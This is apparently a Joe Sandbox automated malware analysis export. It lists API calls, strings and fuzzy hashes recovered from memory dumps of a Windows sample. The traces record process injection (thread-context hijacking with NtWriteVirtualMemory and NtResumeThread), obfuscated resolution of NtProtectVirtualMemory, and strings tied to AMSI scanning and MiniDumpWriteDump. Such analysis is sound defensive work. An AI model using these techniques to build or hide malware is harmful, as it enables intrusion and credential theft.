                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID:
                                                                  • API String ID: 3341692771-0
                                                                  • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                  • Instruction ID: 5708e1abdeb103bc5966ad3fdd0d1c66fbfc24536dfb995ae00c525740892f90
                                                                  • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                  • Instruction Fuzzy Hash: 40C012B268023057FB635699ACD07D362CC9F056A9B1450A1A508DB291E36098005AA1
                                                                  APIs
                                                                  • timeSetEvent.WINMM(00002710,00000000,02EDC354,00000000,00000001), ref: 02EDC370
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Eventtime
                                                                  • String ID:
                                                                  • API String ID: 2982266575-0
                                                                  • Opcode ID: 0b628b4129cff53df2ce053d659c894f4bab6052689161558866209ab11249c7
                                                                  • Instruction ID: 96348da5271337a94165dd0f1ad781c6c71d8814737e67c21bb44cb74c30d7bd
                                                                  • Opcode Fuzzy Hash: 0b628b4129cff53df2ce053d659c894f4bab6052689161558866209ab11249c7
                                                                  • Instruction Fuzzy Hash: 0CC048A13A53406BFA21A6A55C92F73269D9744B14F20A052BB08AA2C1D1A648008AA4
                                                                  APIs
                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02EB4C3F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AllocString
                                                                  • String ID:
                                                                  • API String ID: 2525500382-0
                                                                  • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                  • Instruction ID: 2c83222a4257dc5a751be3566d8c7fa3c85032179bc24fbd7d946d2223ec5b48
                                                                  • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                  • Instruction Fuzzy Hash: 68B092246C820515FA5A22620F207F3004C0F41A8BF84B051AF28C80E2FA00C0019C36
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02EB4C57
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID:
                                                                  • API String ID: 3341692771-0
                                                                  • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                  • Instruction ID: 41e92e41291865d5f6a8987864dfc0fb69c04064ca3fc5af4f167f4d48d6f9c3
                                                                  • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                  • Instruction Fuzzy Hash: 66A011A88802020AAA0B22A800300AB22222EC0A88388E0A822080A0828A2A8000AE20
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02EB1A03,?,02EB1FC1), ref: 02EB15E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 27517a970f0eac47d7ad4758503c38331371cfa6f2561b046a5607a74e281073
                                                                  • Instruction ID: fd023e2371a799e914eb2018bea02e3038fe1256583a6c9cd863b28b5de43f33
                                                                  • Opcode Fuzzy Hash: 27517a970f0eac47d7ad4758503c38331371cfa6f2561b046a5607a74e281073
                                                                  • Instruction Fuzzy Hash: 69F062F0B813044FDB06CFB99950342BBE7EB8A384F10C579E609DB388E77184018B10
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02EB1FC1), ref: 02EB16A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: f914fc10a2465fd8630662f19c6295c940f402a4e93fa5e3091148cb22ea540a
                                                                  • Instruction ID: 09f57c61397d0a8ebe767b67626200b6648daa6ef5e9fe2f5ce03c41b80a4992
                                                                  • Opcode Fuzzy Hash: f914fc10a2465fd8630662f19c6295c940f402a4e93fa5e3091148cb22ea540a
                                                                  • Instruction Fuzzy Hash: 58F090B2A446997BD7119F5A9C90783FB99FB04364F454139FA0CDB344DB70A8108B98
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02EB1FE4), ref: 02EB1704
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: b66fd55213d51ae8e0aa29d857001e59296dec7ceff918db3fba58459f6a9077
                                                                  • Instruction ID: 0acbcc49a45a3a4992c56ac4ba9b9199a49a1668910a83f1fec0f4f1b21293c9
                                                                  • Opcode Fuzzy Hash: b66fd55213d51ae8e0aa29d857001e59296dec7ceff918db3fba58459f6a9077
                                                                  • Instruction Fuzzy Hash: FDE02C75380310AFEB104A7A8C80B83BBCCEF49274F249436F208CF281C2A0E8208B20
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02ECADA7,?,?,02ECAE39,00000000,02ECAF15), ref: 02ECAB34
                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02ECAB4C
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02ECAB5E
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02ECAB70
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02ECAB82
                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02ECAB94
                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02ECABA6
                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02ECABB8
                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02ECABCA
                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02ECABDC
                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02ECABEE
                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02ECAC00
                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02ECAC12
                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02ECAC24
                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02ECAC36
                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02ECAC48
                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02ECAC5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                  • API String ID: 667068680-597814768
                                                                  • Opcode ID: ac13108650a8bb8178f3290e522eeac122aba6dd7aba2140d19a1ac42888ac2b
                                                                  • Instruction ID: 988811b42b0b519fe7da42ef353304bf7faf19fdb94a746b140519f039152d3a
                                                                  • Opcode Fuzzy Hash: ac13108650a8bb8178f3290e522eeac122aba6dd7aba2140d19a1ac42888ac2b
                                                                  • Instruction Fuzzy Hash: 3E310EF1AC03189FEB05AFB4E984E66B7A9AB09345710AD79B401CF348E675A811CF16
                                                                  APIs
                                                                    • Part of subcall function 02EC8798: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02EC8824
                                                                  • GetThreadContext.KERNEL32(00000000,02F37424,ScanString,02F373A8,02ECA940,UacInitialize,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,UacInitialize,02F373A8), ref: 02EC9607
                                                                    • Part of subcall function 02EC7A3C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF
                                                                    • Part of subcall function 02EC7D88: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC
                                                                  • SetThreadContext.KERNEL32(00000000,02F37424,ScanBuffer,02F373A8,02ECA940,ScanString,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,00000000,-00000008,02F374FC,00000004,02F37500), ref: 02ECA31C
                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02F37424,ScanBuffer,02F373A8,02ECA940,ScanString,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,00000000,-00000008,02F374FC), ref: 02ECA329
                                                                    • Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
                                                                    • Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
                                                                    • Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$ContextLibraryMemoryVirtual$AddressAllocateCreateFreeLoadProcProcessResumeUserWrite
                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                  • API String ID: 3519912188-51457883
                                                                  • Opcode ID: 75de197b5073a2ca6fcb7229d0d074760a8a66974f16ab165be32ac19dfca336
                                                                  • Instruction ID: 1c33839bf513d2b9beccf864060819e22500605c008844c0acdae27220b745dd
                                                                  • Opcode Fuzzy Hash: 75de197b5073a2ca6fcb7229d0d074760a8a66974f16ab165be32ac19dfca336
                                                                  • Instruction Fuzzy Hash: 0CE20335A8015C9BDB16FBA4E991BCF73BAAF84300F20D1A5F405AB355DA30AE46CF51
                                                                  APIs
                                                                    • Part of subcall function 02EC8798: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02EC8824
                                                                  • GetThreadContext.KERNEL32(00000000,02F37424,ScanString,02F373A8,02ECA940,UacInitialize,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,UacInitialize,02F373A8), ref: 02EC9607
                                                                    • Part of subcall function 02EC7A3C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateContextCreateMemoryProcessThreadUserVirtual
                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                  • API String ID: 4055342639-51457883
                                                                  • Opcode ID: fd0c5e3c7405c38e6e6415d1698528268b4bfa759a6c0c6240525fb4f1706bf5
                                                                  • Instruction ID: 1d8be876c9520c0a67e486d9da3988c8274f543463050b95c8d64a60d6d4a12a
                                                                  • Opcode Fuzzy Hash: fd0c5e3c7405c38e6e6415d1698528268b4bfa759a6c0c6240525fb4f1706bf5
                                                                  • Instruction Fuzzy Hash: F1E21335A8015C9BDB16FBA4E991BCF73BAAF84300F20D1A5F405AB355DA30AE46CF51
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5925
                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02EB593C
                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02EB596C
                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB59D0
                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5A06
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5A19
                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5A2B
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000,02EDE790), ref: 02EB5A37
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C,02EB0000), ref: 02EB5A6B
                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02EB738C), ref: 02EB5A77
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02EB5A99
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                  • API String ID: 3245196872-1565342463
                                                                  • Opcode ID: c0d6da8a856cf813bf7e8bf6fad14356469c744d53507c0ee786984b279b86f9
                                                                  • Instruction ID: 9a8c834fb6f90d4ca66fe4e91d9a4edc453123bc91ef97462182f4c6ff75ca3d
                                                                  • Opcode Fuzzy Hash: c0d6da8a856cf813bf7e8bf6fad14356469c744d53507c0ee786984b279b86f9
                                                                  • Instruction Fuzzy Hash: B0419E72D80219AFDB12DFE8CC88ADFB3BDAF09354F5495A5A158E7241E730DA448F60
                                                                  APIs
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02EB5BE8
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02EB5BF5
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02EB5BFB
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02EB5C26
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EB5C6D
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EB5C7D
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EB5CA5
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EB5CB5
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02EB5CDB
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02EB5CEB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1599918012-2375825460
                                                                  • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                  • Instruction ID: da56317d1b0fce9b12ad2f09363764660d522e2163a66a564f4128882a189acd
                                                                  • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                  • Instruction Fuzzy Hash: 4431C771E8026C2AEB27DAB4CC45FDF77AE9F04384F4491B1A648E6080D7749E888F50
                                                                  APIs
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC8549
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$MemoryProtectVirtual
                                                                  • String ID: ntdll$yromeMlautriVtcetorPtN
                                                                  • API String ID: 3897345246-351734974
                                                                  • Opcode ID: e04d083fbec31cbee075077dd50a73a372adf2588ca14c098e0b0f05aab23f40
                                                                  • Instruction ID: 54677376531dbdadc7eff72ee5c78bed49ec8109132570ff457c23b89e14e585
                                                                  • Opcode Fuzzy Hash: e04d083fbec31cbee075077dd50a73a372adf2588ca14c098e0b0f05aab23f40
                                                                  • Instruction Fuzzy Hash: 0701DBB5680208AFEB06EFE4DE51E9BB7EEEB48700F619454B904D7640D670A911CB64
                                                                  APIs
                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02EB8005
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1705453755-0
                                                                  • Opcode ID: 5a0fadd8cffa65dcf0b47958c8d1c95365879bf8add663325a1dec14a0d6913b
                                                                  • Instruction ID: c439e505fb6d9d574d1315f0530c9df4b542b022920bc6631fefa212c1d6a40f
                                                                  • Opcode Fuzzy Hash: 5a0fadd8cffa65dcf0b47958c8d1c95365879bf8add663325a1dec14a0d6913b
                                                                  • Instruction Fuzzy Hash: 8D11C0B5E00209AF9B45CFA9CC819FFF7F9EFC9300B54C569A505E7254E6719A018B90
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02EBA7F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
